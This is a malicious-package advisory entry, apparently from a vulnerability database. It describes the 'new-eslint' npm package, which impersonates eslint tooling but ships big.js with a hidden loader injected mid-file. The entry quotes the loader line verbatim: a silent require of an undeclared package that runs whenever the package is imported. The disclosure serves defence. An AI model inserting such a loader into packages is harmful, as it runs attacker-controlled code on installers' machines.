MAL-2026-6224

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25) Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: `const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package `ts-eslint-helper` is not declared in package.json — the manifest lists a different package, `eslint-helper@4.0.1` — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever `ts-eslint-helper.from_str()` does runs in the installer's process on import with no advertised functionality justifying it.